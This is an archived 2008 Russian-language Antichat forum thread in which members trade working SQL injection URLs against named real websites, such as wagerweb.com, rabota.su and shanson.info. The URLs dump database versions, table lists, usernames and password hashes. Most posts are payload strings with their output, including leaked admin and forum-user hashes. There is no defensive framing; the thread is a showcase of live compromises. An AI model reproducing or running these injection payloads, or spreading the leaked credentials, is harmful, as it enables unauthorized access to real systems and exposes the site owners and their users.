ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
13.07.2008, 20:37
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://xteam.alion.ru/newsid.php?id=252+union+select+concat_ws(0x3a,user (),version(),database())
таблиц 150+, ничего интересного в первых 35 не увидел, кроме "adminsmail_start"
если интересно кому - попробуйте до конца её =)
|
|
|
13.07.2008, 20:59
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Freescience.info - PR 5
http://www.freescience.info/go.php?pagename=books&id=-620+union+select+1,2,3,4,5,6,concat(user(),char(58 ),version(),char(58),database()),8,9,0,11,12,13,14 ,15,16,17--
Design.lookmy.info - PR 4
http://design.lookmy.info/index.php?id=401&show=news&newsid=-15406+union+select+user_id,username,user_password+ from+firstline_base.2103_forum_users+limit+1,1--
Calcutta
http://xteam.alion.ru/newsid.php?id=252+union+select+concat_ws(0x3a,logi n,pass)+from+mp_xteam.users
http://xteam.alion.ru/newsid.php?id=252+union+select+concat_ws(0x3a,user name,user_password)+from+mp_xteam.phpbb_users+limi t+1,1
Последний раз редактировалось sabe; 17.07.2008 в 19:24..
|
|
|
|
14.07.2008, 05:44
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Код:
http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,4/*
Код:
http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,table_name+from+information_schema.tables+limit+21,10/*
-------------------------------------------------
Код:
http://www.icewarm.com.au/page.php?pIion+select+1,2,3+users/*
Version:4
Последний раз редактировалось DDoSька; 14.07.2008 в 05:47..
|
|
|
|
14.07.2008, 07:51
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,password+from+punbb_users+lim it+1,1/*
a1881700b14820a22f6712400f49cb3536fd7dcb
http://gafgaf.ru/index.php?pid=-1+union+select+1,2,3,username+from+punbb_users+lim it+1,1/*
http://forum.gafgaf.ru
http://www.icewarm.com.au/page.php?pId=81+union+select+1,2,3+from+mysql.admi n/*
PHP код:
1142: SELECT command denied to user 'dbwwwadmin'@'localhost' for table 'admin'
|
|
|
|
14.07.2008, 14:16
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
http://www.fondsk.ru/article.php?id=1' вот что! Версия 5 порылся в информатион схеме нашел в таблице person 2 поля login(http://www.fondsk.ru/article.php?id=1+union+select+1,2,3,4,5,concat(tab le_name,0x3a,COLUMN_NAME),7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26+from+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x706572736f6e+lim it+1,1/*) и mail(ссылку потерял : ( ) ! Пасворда найти не удалось!!! person,author,subscriber воть еще ! Больше нече пдазрительного найти не удалось!
|
|
|
|
14.07.2008, 18:12
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме:
203452
Репутация:
36
|
|
Как грицо Пришел,увидел,по*мел !!! ВОть http://www.stumptuous.com
ВОть http://www.stumptuous.com/cms/displaysection.php?sid=-1+union+select+table_name,2+from+information_schem a.tables/*
ну и воть : http://www.stumptuous.com/cms/displaysection.php?sid=-1+union+select+column_name,2+from+information_sche ma.columns+where+table_name=0x617574686f7220/*
Пас и логин думаю узнать моно за 1 мин! Я не стал! ИМХО бегу в магаз за пивом)
|
|
|
|
14.07.2008, 18:28
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
BanQui
Рекоммендую для изучения:
Обновлённый антибоян
http://constant1ne.by.ru/sqls.html
И первый пост этой темы
Очень занимательное чтиво
|
|
|
|
14.07.2008, 19:46
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
_www.silversandscasino.com
http://www.silversandscasino.com/silver.asp?goto=1'+or+1=@@version--
http://www.silversandscasino.com/silver.asp?goto=1'%20or%201=(SELECT+TOP+1+email+FR OM+cdrequests+where+id=2000)--
_www.wagerweb.com
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,3,4,5, 6/*
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=13+union+select+1,2,aes_de crypt(aes_encrypt(concat_ws(0x3a,user(),version(), database()),0x71),0x71),4,5,6/*
root@localhost:5.0.15-nt:sitesmanager2 |
|
|
|
14.07.2008, 20:55
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
Rabota.su
http://www.rabota.su/info/makebiz/index.php?id=99999+union+select+concat_ws(0x3a,log in,pwd),2+from+rabota_1.users/*
главная авторизация на сайте.
http://www.rabota.su/info/makebiz/index.php?id=99999+union+select+concat_ws(0x3a,log in,pass),2+from+test.1ckkm_adm_usr/*
поидее админы..
http://www.rabota.su/info/makebiz/index.php?id=99999+union+select+concat_ws(0x3a,log in,pass),2+from+test.my8pref_adm_usr/*
/admin - 500 (
Qanat.info
http://www.qanat.info/en/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,concat_ws(0x3a,version(),user(),database(),0x2 02020202a2623313038303b2623313037363b2623313037373 b2623313039303b202623313039323b2623313038303b26233 13038333b2623313130303b2623313039303b2623313038383 b2623313037323b2623313039343b2623313038303b2623313 130333b2066726f6d2028),18,19,20,21,22/*
наверника фильтрирует from (
Shanson.info
http://shanson.info/mp3/view_cat2.php?id=9999999+union+select+1,2,concat_w s(0x3a,username,user_password)+from+srv12705_sh1fo r.infophpbb3_users--
это пассы от форума, пасс админа в непонятном хеше..
Vlad: $H$9smGyUL04XKl5u16IE4w9MaceJYEqw.
Mkrug.ru - /forum
http://shanson.info/mp3/view_cat2.php?id=9999999+union+select+1,2,concat_w s(0x3a,username,user_password)+from+srv12705_sh1fo r.mkrugphpbb3n_users--
Иван: $H$9Ah37qYJZaSPHfGTDN0MQygFcA1ZWK.
Ogonek.su - /forum
http://shanson.info/mp3/view_cat2.php?id=9999999+union+select+1,2,concat_w s(0x3a,username,user_password)+from+srv12705_etike tt.phpbb_ogonekusers--
admin: $H$9T7Fs09jDWbOgt4NQKRDuOeVs8KhXA/
кароч. там еще много чего интересного )
Последний раз редактировалось sabe; 14.07.2008 в 22:38..
|
|
|
|
14.07.2008, 21:52
|
|
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039
Репутация:
1160
|
|
Код:
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=-13+union+select+1,2,unhex(hex(table_name)),4,5,6+from+information_schema.tables/*
----
Код:
COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS VIEWS USER_PRIVILEGES categories contacts subcategories columns_priv db func help_category help_keyword help_relation help_topic host proc procs_priv tables_priv time_zone time_zone_leap_second time_zone_name time_zone_transition time_zone_transition_type user challenge_mlb challenge_nba challenge_ncaabk challenge_ncaafb challenge_nfl challenge_nhl comments_mlb comments_nba comments_ncaabk comments_ncaafb comments_nfl comments_nhl consensus_mlb consensus_nba consensus_ncaabk consensus_ncaafb consensus_nfl consensus_nhl picks_mlb picks_nba picks_ncaabk picks_ncaafb picks_nfl picks_nhl points_mlb points_nba points_ncaabk points_ncaafb points_nfl points_nhl team_mlb team_nba team_ncaabk team_ncaafb team_nfl team_nhl advertising ariticle_types art_comments articles articles_experts articles_rating blog_articles blog_arttype blog_sports blog_user ch_home_entry ch_home_entry comments countries coverage deposit_promo emailtemplate endorsements eqrace events faq free_contest globalsitepages globalvariables header_text horse_tracks hot_this_week images_promos inprogress jackpots links mail mail_user mainpagetext marquees matchups media media_feeds media_user metatags picks_pros poll_answers poll_questions poll_votes promos props questions races_information right_buttons send_emails shows smcategories smchannels smindex smprivileges smsections sound_files sports_teams states stats_scores teasers temp_articles topfiveleaders topfivematchups topfiveodds users video_shows winners winners_list writers
Код:
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=-13+union+select+1,2,unhex(hex(column_name)),4,5,6+from+information_schema.columns+where+table_name=0x75736572/*
Код:
http://www.wagerweb.com/endorsement-detail.cfm?endorsmentid=-13+union+select+1,2,unhex(hex(concat_ws(0x3a,usern,password,email,admin))),4,5,6+from+users/*
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
